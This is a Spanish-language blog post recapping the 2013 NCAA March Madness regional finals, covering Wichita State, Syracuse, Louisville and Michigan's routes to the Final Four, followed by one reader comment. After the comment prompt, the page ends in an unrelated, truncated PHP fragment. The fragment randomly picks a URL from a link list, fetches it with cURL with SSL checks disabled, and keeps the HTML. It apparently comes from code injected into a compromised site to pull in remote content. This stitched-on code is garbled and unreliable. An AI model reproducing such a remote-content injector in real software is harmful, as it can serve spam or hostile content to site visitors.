March Madness 2013: Los 4 elegidos

02 de April de 2013 por txusma

WEST

Decíamos en nuestro anterior resumen que Ohio State parecía tener el camino despejado. Era, claramente, el mejor de los 4 equipos que aún optaban a clasificarse para la Final Four. Por suerte, el deporte y las matemáticas poco tienen que ver y será Wichita State la que viaje a Atlanta.

Los Shockers no tuvieron rival en su partido del Sweet Sixteen. LaSalle suficiente había hecho con mantenerse viva tras el primer fin de semana y saltaron a la cancha totalmente superados por las circunstancias. Al final de la primera parte ya no había partido y a pesar de que los Explorers plantaron cara en la segunda mitad, los de Wichita se llevaron el choque con facilidad. Malcolm Armstead y Carl Hall fueron los mejores del equipo con 18 y 16 puntos, respectivamente.

Por su parte, Ohio State sudó la gota goda para doblegar a Arizona y no logró imponerse, de nuevo, hasta los segundos finales, esta vez gracias a un triplazo de LaQuinton Ross. Aaron Craft y Deshaun Thomas volvieron a rayar a buen nivel pero fue Ross, con 14 de sus 17 puntos en la 2ª parte y el triple ganador, el que amarró la victoria para los suyos. Arizona llegó a ganar de 11 puntos durante la 1ª mitad pero un mal inicio de la 2ª les dejó a merced de los Buckeyes que no desaprovecharon el regalo.

Wichita había eliminado a Gonzaga y se había mostrado muy sólida ante LaSalle. Ohio State, en cambio, había ganado a rivales teóricamente inferiores en los últimos segundos gracias a dos genialidades de sus jugadores. Sin información previa un neófito podría haber apostado por los Shockers como vencedores en el partido del Elite Eight pero el favoritismo era, sin duda, para los Buckeyes de Ohio State. Por una vez, el neófito hubiese hecho fortuna. Los Buckeyes volvieron a salir dormidos y llegaron a perder de 20 puntos a falta de 11 minutos para el final. En ese momento apareció la casta y la calidad que se les supone y fueron capaces de ponerse a solo 3 puntos con 3 largos minutos por jugar. Normalmente, en estas circunstancias es el equipo experto el que se acaba llevando el gato al agua ante los nervios del teórico rival inferior. Esta vez no fue así. Los jugadores de Wichita mostraron unos nervios de acero y no solo aguantaron sinó que aumentaron la ventaja hasta los 6 puntos. Con solo un minuto por jugar y sin acierto desde la línea de 3 (5 de 25 al final), los Buckeyes vieron como les escurría entre las manos una gran oportunidad. Los Shockers habían hecho historia. DeShaun Thomas jugó un buen partido a pesar de fallar 6 triples mientras que Aaron Craft estuvo un poco por debajo de su nivel habitual. En Wichita fueron Malcolm Armstead y Fred Van Vleet los más destacados. 

EAST

Al Sweet Sixteen llegaron los 4 cabezas de serie de la región pero será Syracuse la que la represente en la Final Four de Atlanta. Todo el crédito para un equipo que se ha cargado a uno de los grandes favoritos y a uno de los conjuntos que mejores sensaciones estaba dejando. Y alerta con el nivel de Michael Carter-Williams.

En nuestra previa ya comentamos que los Orange era un equipo puramente defensivo y los dos partidos que ha jugado este fin de semana han dado una buena muestra de ello. El jueves dejaron a los Hoosiers de Indiana en 50 puntos, su peor puntuación de todo el año, les hicieron perder 19  balones y les colocaron 10 tapones. Semejante exhibición defensiva producto de una soberbia zona 2-3, unida al partido de Carter-Williams (24 puntos, 5 rebotes, 4 robos) fue suficiente para doblegar a Cody Zeller, Victor Oladipo y compañía. El pívot se quedó en 10 puntos y el escolta llegó a 16, ninguno de ellos fáciles. La tela de araña que tejió Syracuse se les tragantó de principio a fin.

En el otro partido del Sweet Sixteen, Marquette se impuso a Miami con Vander Blue tocando de nuevo la guitarra. No fue el máximo anotador de su equipo pero sus canastas fueron claves para abrir una rápida ventaja en la primera parte y su empeño defensivo dificultó enormemente las cosas a los Hurricanes. Estos solo fueron capaces de anotar 1 triple de 12 intentos  y un 21% de los tiros de campo que realizaron en la primera parte, se quedaron en 16 puntos. En la 2ª parte ya no hubo historia y los Golden Eagles llegaron a ganar hasta de 19 puntos.

¿Podrían Vander Blue y sus compañeros imponerse a la zona 2-3 de Syracuse en el partido definitivo?  Si alguien lo creía antes del inicio del partido rápidamente se dio con un canto en los dientes. El partido de los Orange fue una exhibición defensiva, 40 minutos de trampas, de puntear tiros, de cerrar líneas de pase, de sudor y esfuerzo. Una tela de araña de la que solo Davante Gardner pudo escapar mínimamente. Vander Blue anotó 14 puntos pero lo hizo con un 3 de 15 en tiros de campo completamente superado y desquiciado por las manos de los Orange. Marquette se quedó en 39 puntos, la anotación más baja de un equipo en una final de región desde 1986. Michael Carter-Williams volvió a ser el mejor del partido con 12 puntos, 8 rebotes, 6 asistencias, 5 robos y 1 tapón. El jugador total ha visto como su stock de cara al draft crece como la espuma. Se está ganando que nombremos su nombre y el de Magic en la misma frase, aunque sea con la boca pequeña.

MIDWEST

No saltó la banca en la Midwest Region. Lousville y Duke se jugaron el pase a la Final Four y fueron los Cardinals los que se llevaron el gato al agua con autoridad.

El equipo de Rick Pittino ha demostrado durante todo el campeonato una gran entereza y los dos partidos del pasado fin de semana han sido una buena prueba de ello. Frente los Oregon Ducks muchos de sus jugadores saltaron a la cancha con molestias y fiebre, entre ellos su estrella Russ Smith. Sin embargo, a los 10 minutos el partido ya parecía estar visto para sentencia. Los Cardinals salieron como un tiro y rápidamente cogieron más de 15 puntos de ventaja con Smith, una vez más, como estandarte. Oregon apretó en la 2ª parte y llegó a colocarse a 6 puntos pero no pasó de ahí. La victoria cayó del lado de Lousville. Russ Smith anotó 31 puntos e igualó su mejor marca.

El otro partido discurrió más igualado hasta el principio de la 2ª parte. Duke y Michigan State intercambiaron canastas y llegaron con empate a 38 a esos compases del juego. A partir de ahí, los Blue Devils endosaron un parcial de 9-0 a sus rivales y Seth Curry y Mason Plumlee se encargaron de mantener la ventaja hasta el final. El hermano de Stephen Curry jugó uno de sus mejores partidos y acabó con 29 puntos, con 6 de 9 en triples.

Decíamos antes que los Cardinals habían mostrado una gran entereza en sus dos partidos del fin de semana. Tras sobreponerse a la enfermedad en el primero de ellos, tuvieron que hacer de tripas corazón ante la terrible lesión de Kevin Ware en la final para poder imponerse a Duke. La lesión se produjo cuando quedaban 6 minutos de la primera parte y el partido corría empatado. En ese momento nadie sabía como podía afectar a los jugadores de ambos equipos, especialmente a los jugadores de los Cardinals. La respuesta llegó en la 2ª parte: parcial de 20-4 con Peyton Silva y Gorgui Dieng como destacados y partido plácido hasta el final. Seguramente los gritos de Kevin Ware a sus compañeros mientras era retirado en camilla tuvieron mucho que ver: “¡Ganad el partido por mí! ¡Solo ganad el partido! ¡No os preocupéis por mí!”. Russ Smith anotó 23 puntos y se convirtió en el cuarto jugador de los últimos 10 años que más puntos anota en sus 4 primeros partidos de torneo (tras Stephen Curry, Blake Griffin y Kemba Walker). Seth Curry no estuvo muy brillante y se quedó en 12 puntos. Fue Mason Plumlee el que plantó cara con 17 puntos y 12 rebotes.

SOUTH

Comentábamos en la previa que los Kansas Jayhawks sudarían para llegar a la Fina Four y nombrábamos a los Wolverines de Michigan como uno de sus principales escollos. Lo acertamos de pleno: Trey Burke dejó en la cuneta a Ben McLemore y se planta en la final de Atlanta gracias su victoria ante Florida.

Empecemos, sin embargo, por el derby que enfrentaba a Florida contra la gran sorpresa del campeonato, Florida Gulf Coast. Los Eagles fueron fieles a su estilo y nos dejaron una buena serie de jugadas destacadas y una ventaja que llegó hasta los 10 puntos en algunos compases de la primera parte. Sin embargo, un parcial de 13-5 para los Gators en los últimos 5 minutos dió la vuelta al marcador. Con una gran defensa (hasta 20 balones perdió FGC) y con un gran poderío en el ámbito de los rebotes (cogieron 13 rebotes ofensivos), Florida consiguió sacar el partido adelante a pesar de no disputar un buen encuentro en líneas generales. Se acabó así la bonita historia del décimoquinto mejor equipo de la región.

El otro encuentro tuvo un protagonista destacado por encima de todos: Trey Burke. El escolta de los Wolverines acabó la primera parte sin anotar pero mantuvo la confianza en su juego y en la victoria. La mantuvo incluso cuando su equipo perdía de 14 a falta de 7 minutos o incluso cuando perdía de 5 a falta de 21 segundos. Esos 5 puntos que hacían falta para empatar el partido los anotó él, 3 de ellos con un triple increíble a falta de 4 segundos. El triple culminaba una segunda parte memorable que tuvo continuación en la prórroga, al anotar los 5 primeros puntos de su equipo. Kansas tuvo aún la oportunidad de ganar pero no contaban con un Burke en su equipo.Naadir Tharpe falló el triple que les podría haber dado la victoria. Esta vez, a Burke le acompañó Mitch McGary, autor de 25 puntos. Por los Jayhawks asistimos al primer (y único) buen partido de Ben McLemore. El escolta anotó 20 puntos aunque no resultó decisivo.

El partido definitivo se esperaba muy disputado. La defensa de los Gators frente al ataque de los Wolverines. A la hora de la verdad, los de Michigan llevaron el tempo en todo momento y dejaron el encuentro prácticamente finiquitado en la primera parte. Empezaron con un 13-0 de la mano de Mitch McGary y acabaron con 17 puntos de ventaja gracias, sobretodo, a Nik Stauskas que anotó los 5 triples que intentó en esa primera mitad. En la 2ª parte, Florida llegó a ponerse a 11 pero de nuevo Stauskas les apuntilló con otro triple más. Trey Burke estuvo por todas partes y acabó con 15 puntos, 8 rebotes y  asistencias.

Comenta

Un comentario a esta entrada

  1. The wolf dice:
    #1

    Grandísimo análisis y muy buen trabajo. A pesar de que no están los máximos favoritos al draft en esta final four es bonito ver como equipos como Wichita se mete en este gran evento a pesar de no contar con “estrellas” entre sus filas. Por mi parte veo con muchas opciones a Louisville, pero mis favoritos o al menos los que quiero que ganen son los Orange de Syracuse. El partido de estos contra Marquette fue sencillamente una gozada, hacia tiempo que no me divertia tanto viendo a un equipo defender, sencillamente expectacular.

    Habrá que ver como paran a Trey Burke y a Mc Gary, pero si defienden como contra Syracuse es muy dificil ganarles.

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>